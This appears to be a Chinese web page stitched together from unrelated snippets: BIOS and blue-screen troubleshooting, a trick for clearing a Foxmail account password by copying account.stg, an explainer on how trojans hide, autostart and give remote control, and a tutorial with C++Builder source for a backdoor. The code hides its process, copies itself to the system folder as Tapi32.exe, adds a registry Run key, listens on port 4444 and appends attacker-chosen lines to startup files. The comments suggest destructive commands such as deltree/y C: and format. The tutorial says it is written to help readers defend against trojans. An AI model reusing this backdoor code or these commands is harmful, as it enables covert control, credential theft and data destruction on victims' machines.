有相当多的用户，使用简单却功能强大Foxmail做邮件接收工具。但是由于Foxmail本身的安全隐患，一些人只须新建一个账户后，进入Foxmail缺省的安装目录下，将新建的账户目录下的“account.stg”文件复制后将你的账户文件覆盖，你所建立的账户密码就会被清除。

黑客入侵电脑和窃取信息都是用木马吗？

电脑重置以后 每次开机都出现黑屏显示 f12 clear the TPM 和按ESC

重启，按ESC， F1 F2 F10 F12 DEL，进入BIOS，是蓝色的画面

开机时按“del”键，进入BIOS设定，

用上下游标键移动到第二项

“Advanced BIOS Features ”

按回车，在按上下游标键移动到

"Frist Boot drers"，

这时候把按

"Page UP"键和“Page DOWN”

选择属性为

“HDD”或者"DISK HARD"

按F10储存后，重启就可以了。

（由于BIOS不同属性中的硬碟启动也不同）。

电脑开机按f12就黑屏

电脑开机画面后黑屏，按F12或DEL都是黑屏可能原因：

1）显示器与电脑连线接松动。

2）显示器视讯线损坏。

3）记忆体条金手指脏或松动。

4）有独立显示卡则松动或金手指脏。

5）主机板Bios发生变动。

对策：根据上述可能的情况仔细分析，给予解决。

做金手指清洁、插紧接、恢复主机板出厂设定等。

电脑每次开机都蓝屏需按f12才行

问题描述不详细，只能猜测。

估计你的问题是bios存在错误，需要重新设定，如果成功设定后第二天问题再次出现，建议检查主机板电池是否电量耗尽。

=====

并且你们说的那个什么按Del键啦。不管用。没反映。Del是Delete吧？

Del键是Delete。目的是重新设定bios

=====

如何设定bios内容较多建议百度一下，关键词“bios设定”

下面简单摘取一点内容

怎么设定BIOS

绝大部分的电脑都是，在开机的时候按del键进入，选择bios项，一般还有按f1继续选项的，这个没关系，你看看就明白的。具体bios引数设定这给你份详解，你自己根据自己需要改动。

如何进入BIOS？

不同的BIOS有不同的进入方法，通常会在开机画面有提示。

普通台式PC机进入BIOS设定方法：

Award BIOS：按“Del”键

AMI BIOS：按“Del”或“ESC”键

Phoenix BIOS：按“F2”键

其它牌品进入BIOS设定方法：

ibm（冷开机按f1，部分新型号可以在重新启动时启动按f1） hp（启动和重新启动时按f2） sony（启动和重新启动时按f2） dell（启动和重新启动时按f2） acer（启动和重新启动时按f2） toshiba（冷开机时按esc然后按f1） hp paq（开机到右上角出现闪动游标时按f10，或者开机时按f10） fujitsu（启动和重新启动时按f2） 绝大多数国产和台湾品牌（启动和重新启动时按f2）

电脑开机黑屏后按f12后出现一块蓝屏和英文选哪个可以开机

1、虚拟记忆体不足造成系统多工运算错误

2、CPU超频导致运算错误

3、记忆体条的互不相容或损坏引起运算错误

4、 光碟机在读盘时被非正常开启所至

5、遭到不明的程式或攻击所至

6、版本冲突

7、登录档中存在错误或损坏

8、软硬体不相容

9、应用程式存在着BUG

解决方法：

1.软体相容性问题引起电脑蓝屏

刚安装的系统，若驱动与硬体不相容可能会导致蓝屏现象，建议安装硬体赠送光碟中的驱动（要与所用作业系统相符），且驱动没必要追求最新！

长时间使用电脑都没有出现蓝屏现象，而某天突然蓝屏了，这一般是由于电脑内灰尘过多导致记忆体问题（按下面提到方法解决）和软体与系统相容性问题造成，可以回顾下最近新安装了什么软体，将这些软体解除安装后在观察是否还蓝屏？或者使用Windows系统还原功能，直接将系统恢复至上一个还原点进行检测！

2

记忆体条接触不良或记忆体损坏导致电脑蓝屏

解决办法：清理机箱内灰尘，拔下记忆体条，用橡皮擦拭金手指，再重新插紧。

3

木马导致电脑蓝屏

如今木马种类越来越多，传播途径多种多样，防不胜防，有些木马感染系统档案，造成系统档案错误，或导致系统耗尽，也可能造成蓝屏现象的发生，建议安装防毒能力强调防毒软体，如卡巴斯基，NOD32等进行检测，但众所周知，防毒软体的更新速度难以赶上的速度，这就需要我们练就手动查杀的能力，推荐使用Process Explorer 强制终止恶意程序（微软官方推荐的程序监视工具）

使用Process Explorer 查杀的一个案例：IE主页被恶意修改后自己无法修改主页的解决方法

4

硬碟出现坏道导致电脑蓝屏

解决办法：备份重要资料后重新格式化系统分割槽（重灌原版Windows系统时会有格式化的选项），如果格式化成功则不影响使用，否则只能弃用该分割槽或者更换硬碟。

END

避免方法

避免电脑蓝屏的几点要求：

1，定期清理电脑机箱内部灰尘

2，不要滥装软体，不要看到什么软体都去安装

3，少浏览不健康的网站，不要轻易开启陌生人分享的网站

4，不要同时执行多个耗费的程式，避免电脑耗尽

4，定期清理系统垃圾，进行磁碟碎片整理，避免出现硬碟坏道！

其他解决方法：更新安全软体，更新驱动，查杀木马

以上方法如果无效，那么就是硬体坏了，建议送售后

电脑开机显示器出现f12bootions

f2setup按F2键进入CMOS设定f12bootions按F12键进入引导选单以上提示说明你的电脑引导系统已经出问题了，可按F12键进入引导选单，选择HDD（硬碟）引导，回车。若仍进不了系统，就只能重灌系统了。

每次开启电脑都是黑屏出现字母按F1才可以开机

如果电脑用起来没别的毛病，你进BIOS里把错误报告关了。

bios中standard cmos features 下halt on选项,如果设定成“NO ERRORS”，即不检测任务错误，而“ALL，BUT KEYBOARD”是指检测除了键盘以外的错误。设成NO ERRORS，往往有些小的问题，不会出现开机检测后黑白屏定屏提示，往往这种现象需要人为介入，否则画面不往下走。

一般设定选择“ALL，BUT KEYBOARD

每次开机出现F1 F2 F12啊

你好！

请您详细的描述出现的问题、错误提示的详细内容等，这样才可以根据您的机型及出现的问题，提出针对性的解决方案。

每次开机都得按F12

尊敬的使用者您好

重启机器后开机多次按F1（Fn+F1）进入BIOS，选择Security—Secure Boot—Disabled，再进入Startup—UEFI/Legacy Boot选项，UEFI/Legacy Boot设定为Legacy only，最后再按F10（Fn+F10）选择YES储存退出。

电脑每次开机都出现蓝屏

当电脑发生蓝屏故障时，按照如下的检修方法进行检修。

（1）首先了解发生蓝屏前电脑的情况及所做的操作。如果电脑在CPU或记忆体等超频后，出现蓝屏，则蓝屏故障与超频有关，只要将频率恢复正常即可。

（2）如果电脑在光碟机读盘时被非正常开启导致蓝屏，则蓝屏故障是由于被误操作引起的，此故障一般将光碟重新放入光碟机，再关上光碟机托盘即可。

（3）如果电脑在带电插拔某装置时发生蓝屏，则蓝屏故障与带电插拔装置有关，一般重新启动电脑即可恢复。

（4）如果电脑在使用某一个应用程式软体时发生蓝屏，则蓝屏故障可能是由此程式软体引起的，一般将程式软体解除安装，再重新安装即可排除故障；如果不行，则可能是程式软体本身有错误，不能使用。

（5）如果电脑在进入系统后就出现蓝屏，引起蓝屏故障的原因可能较多，需要逐步进行排除。先用防毒软体查杀，排除造成的蓝屏故障，如果故障排除，则是造成的蓝屏故障。

（6）如果故依旧，重新启动电脑，然后再用“安全模式”启动电脑，启动后退出系统再重新启动到正常模式，如果排除则是系统错误造成的蓝屏故障。

（7）如果故障没有排除，接着使用备份的登录档将Windows登录档恢复到正常的状态，如果故障排除，则是Windows登录档损坏引起的蓝屏故障。

（8）如果故障没有排除，接着使用Windows系统中的“检视器”查询错误原因。以Windows2000\XP系统为例，首先单击“控制面板/管理工具/检视器”命令，“检视器”视窗，在“检视器”视窗的右边视窗中，系统列出使用电脑的。接着根据日期和时间重点检查“系统”和“应用程式”中的型别标志为“错误”的。接着双击“错误”的，开启错误的“属性”对话方块，查询错误原因，再进行针对性的修复。

木马是怎么利用电脑系统的漏洞来进行攻击的?

什么是木马?

特洛伊木马(以下简称木马)，英文叫做“Trojan house”，其名称取自希腊神话的特洛伊木马记。

它是一种基于远程控制的黑客工具，具有隐蔽性和非授权性的特点。

所谓隐蔽性是指木马的设计者为了防止木马被发现，会用多种手段隐藏木马，这样服务端即使发现感染了木马，由于不能确定其具体位置，往往只能望“马”兴叹。

所谓非授权性是指一旦控制端与服务端连接后，控制端将享有服务端的大部分操作权限，包括修改文件，修改注册表，控制鼠标，键盘等等，而这些权力并不是服务端赋予的，而是通过木马程序窃取的。

从木马的发展来看，基本上可以分为两个阶段。

最初网络还处于以UNIX平台为主的时期，木马就产生了，当时的木马程序的功能相对简单，往往是将一段程序嵌入到系统文件中，用跳转指令来执行一些木马的功能，在这个时期木马的设计者和使用者大都是些技术人员，必须具备相当的网络和编程知识。

而后随着WINDOWS平台的日益普及，一些基于图形操作的木马程序出现了，用户界面的改善，使使用者不用懂太多的专业知识就可以熟练的操作木马，相对的木马入侵也频繁出现，而且由于这个时期木马的功能已日趋完善，因此对服务端的破坏也更大了。

所以所木马发展到今天，已经无所不用其极，一旦被木马控制，你的电脑将毫无秘密可言。

鉴于木马的巨大危害性，我们将分原理篇，防御与反击篇，资料篇三部分来详细介绍木马，希望大家对特洛伊木马这种攻击手段有一个透彻的了解。

原 理 篇

基础知识

在介绍木马的原理之前有一些木马构成的基础知识我们要事先加以说明,因为下面有很多地方会提到这些内容。

一个完整的木马系统由硬件部分，软件部分和具体连接部分组成。

(1)硬件部分：建立木马连接所必须的硬件实体。 控制端：对服务端进行远程控制的一方。 服务端：被控制端远程控制的一方。 INTERNET：控制端对服务端进行远程控制，数据传输的网络载体。

(2)软件部分：实现远程控制所必须的软件程序。 控制端程序：控制端用以远程控制服务端的程序。 木马程序：潜入服务端内部，获取其操作权限的程序。 木马配置程序：设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏得更隐蔽的程序。

(3)具体连接部分：通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP，服务端IP：即控制端，服务端的网络地址，也是木马进行数据传输的目的地。 控制端端口，木马端口：即控制端，服务端的数据入口，通过这个入口，数据可直达控制端程序或木马 程序。

木马原理

用木马这种黑客工具进行网络入侵，从过程上看大致可分为六步(具体可见下图)，下面我们就按这六步来详细阐述木马的攻击原理。

一.配置木马

一般来说一个设计成熟的木马都有木马配置程序，从具体的配置内容看，主要是为了实现以下两方 面功能：

(1)木马伪装：木马配置程序为了在服务端尽可能的好的隐藏木马，会用多种伪装手段，如修改图标 ，捆绑文件，定制端口，自我销毁等，我们将在“传播木马”这一节中详细介绍。

(2)信息反馈：木马配置程序将就信息反馈的方式或地址进行设置，如设置信息反馈的邮件地址，IRC号 ，ICO号等等，具体的我们将在“信息反馈”这一节中详细介绍。

二.传播木马

(1)传播方式:

木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出 去, 收信人只要打开附件系统就会感染木马;另一种是软件下载，一些非正规的网站以提供软件下载为 名义， 将木马捆绑在软件安装程序上，下载后，只要一运行这些程序，木马就会自动安装。

(2)伪装方式:

鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这 是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目 的。

(一)修改图标

当你在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?但是我不得不告 诉你,这也有可能是个木马程序,现在 已经有木马可以将木马服务端程序的图标改成HTML,TXT, ZIP等各种文件的图标,这有相当大的迷 惑性,但是目前提供这种功能的木马还不多见,并且这种 伪装也不是无懈可击的,所以不必整天提 心吊胆,疑神疑鬼的。

(二)捆绑文件

这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的 情况下 ,偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即EXE,COM一类的文件)。

(三)出错显示

有一定木马知识的人都知道,如果打开一个文件,没有任何反应,这很可能就是个木马程序, 木马的 设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。当服务 端用户打开木 马程序时,会弹出一个如下图所示的错误提示框(这当然是的),错误内容可自由 定义,大多会定制成 一些诸如“文件已破坏，无法打开的！”之类的信息，当服务端用户信以 为真时,木马却悄悄侵入了 系统。

(四)定制端口

很多老式的木马端口都是固定的,这给判断是否感染了木马带来了方便,只要查一下特定的 端口就 知道感染了什么木马,所以现在很多新式的木马都加入了定制端口的功能,控制端用户可 以在---65535之间任选一个端口作为木马端口(一般不选以下的端口)，这样就给判断 所感染木马类型带 来了麻烦。

(五)自我销毁

这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后，木马 会将自己拷贝到WINDOWS的系统文件夹中(C:\WINDOWS或C:\WINDOWS\SYSTEM目录下)，一般来说 原木马文件 和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外),那么中了木马 的朋友只要在近来 收到的信件和下载的软件中找到原木马文件,然后根据原木马的大小去系统 文件夹找相同大小的文件, 判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木 马后，原木马文件将自动销毁，这 样服务端用户就很难找到木马的来源，在没有查杀木马的工 具帮助下，就很难删除木马了。

(六)木马更名

安装到系统文件夹中的木马的文件名一般是固定的，那么只要根据一些查杀木马的文章,按 图索骥在系统文件夹查找特定的文件,就可以断定中了什么木马。所以现在有很多木马都允许控 制端用户自由定制安装后的木马文件名，这样很难判断所感染的木马类型了。

三.运行木马

服务端用户运行木马或捆绑木马的程序后,木马就会自动进行安装。首先将自身拷贝到WINDOWS的 系统文件夹中(C:\WINDOWS或C:\WINDOWS\SYSTEM目录下),然后在注册表,启动组,非启动组中设置好木马 的触发条件 ,这样木马的安装就完成了。安装后就可以启动木马了，具体过程见下图：

(1)由触发条件激活木马

触发条件是指启动木马的条件,大致出现在下面八个地方:

1.注册表:打开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\下的五个以Run 和RunServices主键,在其中寻找可能是启动木马的键值。

2.WIN.INI:C:\WINDOWS目录下有一个配置文件win.ini，用文本方式打开，在[windows]字段中有启动 命令 load=和run=,在一般情况下是空白的,如果有启动程序,可能是木马。 3.SYSTEM.INI:C:\WINDOWS目录下有个配置文件system.ini，用文本方式打开，在[386Enh],[mic]， [drivers32]中有命令行,在其中寻找木马的启动命令。

4.Autoexec.bat和Config.sys:在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都 需要控制端用户与服务端建立连接后，将已添加木马启动命令的同名 文件上传 到服务端覆盖这两个文件才行。

5.*.INI:即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马 启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。

6.注册表:打开HKEY_CLASSES_ROOT\文件类型\shell\open\command主键,查看其键值。举个例子,国产 木马“冰河”就是修改HKEY_CLASSES_ROOT\txtfile\shell\open\command下的键值,将“C :\WINDOWS \NOTEPAD.EXE %1”该为“C:\WINDOWS\SYSTEM\SYXXXPLR.EXE %1”，这时你双 击一个TXT文件 后，原本应用NOTEPAD打开文件的，现在却变成启动木马程序了。还要说明 的是不光是TXT文件 ，通过修改HTML，EXE，ZIP等文件的启动命令的键值都可以启动木马 ，不同之处只在于“文件类型”这个主键的差别，TXT是txtfile,ZIP是WINZIP，大家可以 试着去找一下。

7.捆绑文件:实现这种触发条件首先要控制端和服务端已通过木马建立连接，然后控制端用户用工具 软件将木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样即使 木马被删 除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。

8.启动菜单:在“开始---程序---启动”选项下也可能有木马的触发条件。

(2)木马运行过程

木马被激活后，进入内存，并开启事先定义的木马端口，准备与控制端建立连接。这时服务端用 户可以在MS-DOS方式下，键入NETSTAT -AN查看端口状态，一般个人电脑在脱机状态下是不会有端口 开放的，如果有端口开放，你就要注意是否感染木马了。下面是电脑感染木马后，用NETSTAT命令查 看端口的两个实例：

其中①是服务端与控制端建立连接时的显示状态，②是服务端与控制端还未建立连接时的显示状态。

在上网过程中要下载软件，发送信件，网上聊天等必然打开一些端口，下面是一些常用的端口：

(1)1---之间的端口：这些端口叫保留端口，是专给一些对外通讯的程序用的，如FTP使用21， SMTP使用25，POP3使用110等。只有很少木用保留端口作为木马端口 的。

(2)1025以上的连续端口：在上网浏览网站时，浏览器会打开多个连续的端口下载文字，到本地 硬盘上，这些端口都是1025以上的连续端口。

(3)4000端口：这是OICQ的通讯端口。

(4)6667端口：这是IRC的通讯端口。 除上述的端口基本可以排除在外，如发现还有其它端口打开，尤其是数值比较大的端口，那就要怀疑 是否感染了木马，当然如果木马有定制端口的功能，那任何端口都有可能是木马端口。

四.信息泄露:

一般来说，设计成熟的木马都有一个信息反馈机制。所谓信息反馈机制是指木马成功安装后会收集 一些服务端的软硬件信息，并通过E-MAIL，IRC或ICO的方式告知控制端用户。下图是一个典型的信息反 馈邮件。

从这封邮件中我们可以知道服务端的一些软硬件信息，包括使用的操作系统，系统目录，硬盘分区况， 系统口令等，在这些信息中，最重要的是服务端IP，因为只有得到这个参数，控制端才能与服务端建立 连接，具体的连接方法我们会在下一节中讲解。

五.建立连接：

这一节我们讲解一下木马连接是怎样建立的 。一个木马连接的建立首先必须满足两个条件：一是 服务端已安装了木马程序；二是控制端，服务端都要在线 。在此基础上控制端可以通过木马端口与服 务端建立连接。为了便于说明我们用图示的形式来讲解。

如上图所示A机为控制端，B机为服务端，对于A机来说要与B机建立连接必须知道B机的木马端口和IP地 址，由于木马端口是A机事先设定的，为已知项，所以最重要的是如何获得B机的IP地址。获得B机的IP 地址的方法主要有两种：信息反馈和IP扫描。对于前一种已在上一节中已经介绍过了，不再赘述，我们 重点来介绍IP扫描，因为B机装有木马程序，所以它的木马端口7626是处于开放状态的，所以现在A机只 要扫描IP地址段中7626端口开放的主机就行了，例如图中B机的IP地址是202.102.47.56，当A机扫描到 这个IP时发现它的7626端口是开放的，那么这个IP就会被添加到列表中，这时A机就可以通过木马的控 制端程序向B机发出连接信号，B机中的木马程序收到信号后立即作出响应，当A机收到响应的信号后， 开启一个随即端口1031与B机的木马端口7626建立连接，到这时一个木马连接才算真正建立。值得一提 的要扫描整个IP地址段显然费时费力，一般来说控制端都是先通过信息反馈获得服务端的IP地址，由于 拨号上网的IP是动态的，即用户每次上网的IP都是不同的，但是这个IP是在一定范围内变动的，如图中 B机的IP是202.102.47.56，那么B机上网IP的变动范围是在202.102.000.000---202.102.255.255，所以 每次控制端只要搜索这个IP地址段就可以找到B机了。

六.远程控制：

木马连接建立后，控制端端口和木马端口之间将会出现一条通道，见下图

控制端上的控制端程序可藉这条通道与服务端上的木马程序取得联系,并通过木马程序对服务端进行远 程控制。下面我们就介绍一下控制端具体能享有哪些控制权限，这远比你想象的要大。

(1)窃取密码：一切以明文的形式，*形式或缓存在CACHE中的密码都能被木马侦测到，此外很多木马还 提供有击键记录功能，它将会记录服务端每次敲击键盘的动作，所以一旦有木马入侵， 密码将很容易被窃取。

(2)文件操作：控制端可藉由远程控制对服务端上的文件进行删除,新建,修改,上传,下载,运行,更改属 性等一系列操作,基本涵盖了WINDOWS平台上所有的文件操作功能。

(3)修改注册表：控制端可任意修改服务端注册表，包括删除，新建或修改主键，子键，键值。有了这 项功能控制端就可以禁止服务端软驱，光驱的使用，锁住服务端的注册表，将服务端 上木马的触发条件设置得更隐蔽的一系列高级操作。

(4)系统操作：这项内容包括重启或关闭服务端操作系统，断开服务端网络连接，控制服务端的鼠标， 键盘，监视服务端桌面操作，查看服务端进程等，控制端甚至可以随时给服务端发送信 息，想象一下，当服务端的桌面上突然跳出一段话，不吓人一跳才怪

三者差异，其实现在已经越来越小了。

蠕虫，现在具体指那些通过漏洞或者电子邮件等快速传播的程序，它们大都以快速传播为目的，以此躲避彻底查杀，蠕虫一般很少感染可执行文件。

当攻击者进入你的系统后，它会放置一个木马，或者，攻击者会欺骗你运行木马。木马的作用是帮助攻击者更加容易地操作你的电脑，它们很少自行破坏文件，因为它们一般要长期待在你的系统中。

，最大类的东西，按照现在的分类趋势，几乎能够涵盖木马和蠕虫，它泛指那些对用户有害的程序，又特指其中会自我传播的那一部分。早期的，一般意义的是指会感染文件的文件型。

电脑木马的原理是什么啊？

木马是如何编写的（一）

特洛依木马这个名词大家应该不陌生，自从98年“死牛崇拜”黑客小组公布Back Orifice以来，木马犹如平地上的惊雷，使在Dos?Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒，终于认识到的网络也有它邪恶的一面，一时间人心惶惶。

我那时在《电脑报》上看到一篇文章，大意是一个菜鸟被人用BO控制了，吓得整天吃不下饭、睡不着觉、上不了网，到处求救！呵呵，要知道，木马（Trojan）的历史是很悠久的：早在AT&T Unix和BSD Unix十分盛行的年代，木马是由一些玩程式（主要是C）水平很高的年轻人（主要是老美）用C或Shell语言编写的，基本是用来窃取登陆主机的口令，以取得更高的权限。那时木马的主要方法是诱骗?先修改你的.profile文件，植入木马；当你登陆时将你敲入的口令字符存入一个文件，用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的，对网络可以说很陌生。直到Win9x横空出世，尤其是WinNt的普及，大大推动了网络事业的发展的时候，BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马（甚至在Win9x的“关闭程序”对话框可以看到进程）给了当时中国人极大的震撼，它在中国的网络安全方面可以说是一个划时代的软件。

自己编写木马，听起来很Cool是不是？！木马一定是由两部分组成?服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的网络协议来进行通讯（一般是TCP/IP协议）。为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈?难道你还给受害者传一个1兆多的动态链接库?Msvbvm60.dll吗？

启动C++Builder 5.0企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和SMTP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

我们首先应该让我们的程序能够隐身。双击Form，首先在FormCreate中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘，其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此，只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程（Service Process）就可以了。不过该函数的声明在Borland预先打包的头文件中没有，那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。

首先判断目标机的操作系统是Win9x还是WinNt：

{

DWORD dwVersion = GetVersion();

// 得到操作系统的版本号

if (dwVersion >= 0x80000000)

// 操作系统是Win9x，不是WinNt

{

typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);

file://定义RegisterServiceProcess()函数的原型

HINSTANCE hDLL;

LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

hDLL = LoadLibrary("KERNEL32");

file://加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL

lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");

file://得到RegisterServiceProcess()函数的地址

lpRegisterServiceProcess(GetCurrentProcessId(),1);

file://执行RegisterServiceProcess()函数,隐藏本进程

FreeLibrary(hDLL);

file://卸载动态链接库

}

}

这样就终于可以隐身了（害我敲了这么多代码！）。为什么要判断操作系统呢？因为WinNt中的进程管理器可以对当前进程一览无余，因此没必要在WinNt下也使用以上代码（不过你可以使用其他的方法，这个留到后面再讲）。接着再将自己拷贝一份到%System%目录下，例如：C:\Windows\System，并修改注册表，以便启动时自动加载：

{

char TempPath[MAX_PATH];

file://定义一个变量

GetSystemDirectory(TempPath ,MAX_PATH);

file://TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小，得到目标机的System目录路径

SystemPath=AnsiString(TempPath);

file://格式化TempPath字符串，使之成为能供编译器使用的样式

CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);

file://将自己拷贝到%System%目录下，并改名为Tapi32.exe，伪装起来

Registry=new TRegistry;

file://定义一个TRegistry对象，准备修改注册表，这一步必不可少

Registry->RootKey=HKEY_LOCAL_MACHINE;

file://设置主键为HKEY_LOCAL_MACHINE

Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);

file://打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就创建之

try

{

file://如果以下语句发生异常，跳至catch，以避免程序崩溃

if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")

Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");

file://查找是否有“crossbow”字样的键值，并且是否为拷贝的目录%System%+Tapi32.exe

file://如果不是，就写入以上键值和内容

}

catch(...)

{

file://如果有错误，什么也不做

}

}

好，FormCreate过程完成了，这样每次启动都可以自动加载Tapi32.exe，并且在“关闭程序”对话框中看不见本进程了，木马的雏形初现。

接着选中ServerSocket控件，在左边的Object Inspector中将Active改为true，这样程序一启动就打开特定端口，处于服务器工作状态。再将Port填入4444，这是木马的端口号，当然你也可以用别的。但是你要注意不要用以下的低端端口，因为这样不但可能会与基本网络协议使用的端口相冲突，而且很容易被发觉，因此尽量使用以上的高端端口（不过也有这样一种技术，它故意使用特定端口，因为如果引起冲突，Windows也不会报错 ^_^）。你可以看一看TNMFTP控件使用的端口，是21号端口，这是FTP协议的专用控制端口（FTP Control Port）；同理TNMSMTP的25号端口也是SMTP协议的专用端口。

再选中ServerSocket控件，点击Events页，双击OnClientRead，敲入以下代码：

{

FILE *fp=NULL;

char * content;

int times_of_try;

char TempFile[MAX_PATH];

file://定义了一堆待会儿要用到的变量

sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());

file://在%System%下建立一个文本文件Win369.bat，作为临时文件使用

AnsiString temp=Socket->ReceiveText();

file://接收客户端（攻击者，也就是你自己）传来的数据

}

好，大门敞开了！接着就是修改目标机的各种配置了！^_^ 首先我们来修改Autoexec.bat和Config.sys吧：

{

if(temp.SubString(0,9)=="edit conf")

file://如果接受到的字符串的前9个字符是“edit conf”

{

int number=temp.Length();

file://得到字符串的长度

int file_name=atoi((temp.SubString(11,1)).c_str());

file://将第11个字符转换成integer型，存入file_name变量

file://为什么要取第11个字符，因为第10个字符是空格字符

content=(temp.SubString(12,number-11)+'\n').c_str();

file://余下的字符串将被作为写入的内容写入目标文件

FILE *fp=NULL;

char filename[20];

chmod("c:\\autoexec.bat",S_IREADS_IWRITE);

chmod("c:\\config.sys",S_IREADS_IWRITE);

file://将两个目标文件的属性改为可读可写

if(file_name==1)

sprintf(filename,"%s","c:\\autoexec.bat");

file://如果第11个字符是1,就把Autoexec.bat格式化

else if(file_name==2)

sprintf(filename,"%s","c:\\config.sys");

file://如果第11个字符是1,就把Config.sys格式化

times_of_try=0;

file://定义计数器

while(fp==NULL)

{

file://如果指针是空

fp=fopen(filename,"a+");

file://如果文件不存在，创建之；如果存在，准备在其后添加

file://如果出错，文件指针为空，这样就会重复

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try>100)

{

file://如果已经试了100次了，仍未成功

Socket->SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://跳至END处

}

}

fwrite(content,sizeof(char),strlen(content),fp);

file://写入添加的语句，例如deltree/y C:或者format/q/autotest C:，够毒吧？！

fclose(fp);

file://写完后关闭目标文件

Socket->SendText("Sucess");

file://然后发回“Success”的成功信息

}

}

上回我们讲到如何修改目标机上的启动配置文件，这回我们就来查看目标机上的目录树和文件吧，这在客户端上使用“dir”命令，跟着敲?：

{

else if(temp.SubString(0,3)=="dir")

{

file://如果前3个字符是“dir”

int Read_Num;

char * CR_LF="\n";

int attrib;

char *filename;

DIR *dir;

struct dirent *ent;

int number=temp.Length();

file://得到字符串的长度

AnsiString Dir_Name=temp.SubString(5,number-3);

file://从字符串第六个字符开始，将后面的字符存入Dir_Name变量，这是目录名

if(Dir_Name=="")

{

file://如果目录名为空

Socket->SendText("Fail By Open DIR's Name");

file://返回“Fail By Open DIR's Name”信息

goto END;

file://跳到END

}

char * dirname;

dirname=Dir_Name.c_str();

if ((dir = opendir(dirname)) == NULL)

{

file://如果打开目录出错

Socket->SendText("Fail by your DIR's name!");

file://返回“Fail By Your DIR's Name”信息

goto END;

file://跳到END

}

times_of_try=0;

while(fp==NULL)

{

file://如果指针是NULL

fp=fopen(TempFile,"w+");

file://就创建system\Win369.bat准备读和写；如果此文件已存在，则会被覆盖

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try>100)

{

file://如果已经试了100次了，仍未成功（真有耐心！）

Socket->SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://并跳到END处

}

}

while ((ent = readdir(dir)) != NULL)

{

file://如果访问目标目录成功

if(*(AnsiString(dirname)).AnsiLastChar()!='\\')

file://如果最后一个字符不是“\”，证明不是根目录

filename=(AnsiString(dirname)+"\\"+ent->d_name).c_str();

file://加上“\”字符后将指针指向目录流

else

filename=(AnsiString(dirname)+ent->d_name).c_str();

file://如果是根目录，则不用加“\”

attrib=_rtl_chmod(filename, 0);

file://得到目标文件的访问属性

if (attrib & FA_RDONLY)

file://“&”字符是比较前后两个变量，如果相同返回1,否则返回0

fwrite(" R",sizeof(char),3,fp);

file://将目标文件属性设为只读

else

fwrite(" ",sizeof(char),3,fp);

file://失败则写入空格

if (attrib & FA_HIDDEN)

fwrite("H",sizeof(char),1,fp);

